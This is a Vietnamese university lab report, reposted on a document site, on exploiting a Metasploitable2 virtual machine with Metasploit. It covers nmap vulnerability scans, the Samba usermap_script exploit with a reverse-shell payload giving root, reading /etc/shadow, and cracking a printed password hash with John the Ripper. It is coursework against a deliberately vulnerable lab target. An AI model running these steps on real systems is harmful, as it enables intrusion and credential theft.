1. Trang chủ
  2. » Luận Văn - Báo Cáo

Báo cáo môn học an toàn hệ Điều hành bài thực hành số 1

16 0 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Tiêu đề Báo Cáo Môn Học: An Toàn - Hệ Điều Hành Bài Thực Hành Số 1
Tác giả Đinh Đăng Doanh
Người hướng dẫn Hoàng Xuân Dậu
Trường học Học Viện Công Nghệ Bưu Chính Viễn Thông
Chuyên ngành An Toàn Thông Tin
Thể loại Báo cáo
Năm xuất bản 2024
Thành phố Hà Nội
Định dạng
Số trang 16
Dung lượng 7,33 MB

Nội dung

Nội dung thực hànhCài đặt Kali Linux Đổi tên máy kali Kiểm tra và chạy thử bộ công cụ tấn công MetaSploit... Tạo mật khẩu cho người dùng: sudo passwd doanhdd063 , nhập mật khẩu mới 2 lần

Trang 1

Cài đặt các công cụ, nền tảng

HỌC VIỆN CÔNG NGHỆ BƯU CHÍNH VIỄN THÔNG

KHOA AN TOÀN THÔNG TIN

BÁO CÁO

Giảng viên: Hoàng Xuân Dậu Sinh viên: Đinh Đăng Doanh

Mã sinh viên :B21DCAT063

Hà Nội,03/2024

Trang 2

I Nội dung thực hành

Cài đặt Kali Linux

Đổi tên máy kali

Kiểm tra và chạy thử bộ công cụ tấn công MetaSploit

Trang 3

Tải và cài đặt Metasploitable2 làm máy victim:

Sử dụng VMWare để mở và khởi động máy ảo Tài khoản đăng nhập vào hệ thống

là msfadmin / msfadmin

Tạo mới người dùng cho mình: sudo useradd doanhdd063

Trang 4

Tạo mật khẩu cho người dùng: sudo passwd doanhdd063 , nhập mật khẩu mới 2 lần (lưu ý đặt mật khẩu đơn giản và ngắn để có thể crack được)

Đặt lại tên máy chứa lỗi là B21AT063-Doanh-Meta

Khởi động lại máy sudo reboot

Trang 5

2 Quét máy Victim Metasploit2 tìm các lỗ hổng tồn tại

Tìm địa chỉ IP của máy victim, kali:

o Chạy lệnh trong cửa sổ terminal: ifconfig eth0

Trang 6

- ểm tra kết nối mạng giữa các máyKi

Từ kali

Từ victim

Trang 7

Sử dụng công cụ nmap để rà quét các lỗ hổng tồn tại trên máy chạy

Metasploitable2:

o Quét cổng dịch vụ netbios-ssn cổng 139:

nmap script vuln -p139 192.168.17. 146

- Quét cổng dịch vụ microsoft-ds cổng 445:

o nmap script vuln -p445 192.168.17.146

Trang 8

3 Khai thác tìm phiên bản Samba đang hoạt động:

- Khởi động Metasploit

Khai báo sử dụng mô đun tấn công: msf > use auxiliary/scanner/smb/smb_version Chạy lệnh “show options” để xem các thông tin về mô đun tấn công đang sử dụng

Trang 9

Đặt địa chỉ IP máy victim: msf > set RHOST 192.168.17.146

Thực thi tấn công:

msf > run

Trang 10

➔ Máy victim sẽ ệt kê tên dịch vụ Samba và phiên bảnli

4 Khai thác lỗi trên Samba cho phép mở shell chạy với quyền root:

Khởi động Metasploit

- Khai báo sử dụng mô đun tấn công:

msf > use exploit/multi/samba/usermap_script

Chạy lệnh “show options” để xem các thông tin về mô đun tấn công đang sử dụng

Trang 11

Đặt địa chỉ IP máy victim:

msf > set RHOST 192.168.17.146

Trang 12

Chọn payload cho thực thi (mở shell): msf > set payload cmd/unix/reverse

Đặt 445 là cổng truy cập máy victim:

msf > set RPORT 445

Chạy lệnh “show options” để xem các thông tin về ết lập tấn công đang sử dụthi ng

- Thực thi tấn công:

Trang 13

msf > exploit

➔ Cửa hậu mở shell với người dùng root cho phép chạy lệnh từ máy Kali

➔ có thể ực hiện bất cứ lệnh shell nào trên máy victim.th

- Chạy các lệnh để đọc tên người dùng và máy đang truy cập:

whoami

uname -a

- Lấy tên người dùng và mật khẩu đã tạo ở mục 3.1:

cat /etc/shadow | grep doanhdd063

Trang 14

- Chọn và sao chép cả dòng tên người dùng và mật khẩu băm vào clipboard doanhdd063:$1$P.dw5zDj$LVG7fe9Klbpa3tqbc7iU4.:19800:0:99999:7:::

Mở một cửa sổ Terminal mới, chạy lệnh:

nano password

Trang 15

sau đó paste thông tin tên người dùng và mật khẩu băm từ clipboard vào file password

Crack để lấy mật khẩu sử dụng chương trình john the ripper (hoặc 1 công cụ crack mật khẩu khác):

john show password

Mật khẩu là 123

II.Tổng kết

Trang 16

Yêu cầu cần đạt

1 Thành thạo cài đặt và chạy máy ảo Ubuntu

2 Thành thạo sử dụng Metasploit để tấn công khai thác lỗ hổng sử dụng thư viện

có sẵn

3 Chụ ảnh màn hình kết quả lưu vào file (hoặc giữ nguyên cửa sổ màn hình thựp c hiện):

a Màn hình quét các lỗ hổng

b Màn hình phiên bản Samba

c Màn hình sau khi tấn công thành công và chạy các lệnh whoami và uname -a trên

hệ ống victim (tên máy đặt lại theo yêu cầu);th

d Màn hình chạy lệnh cat trích xuất tên và mật khẩu người dùng

e Màn hình crack mật khẩu

Ngày đăng: 23/02/2025, 21:29

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN

w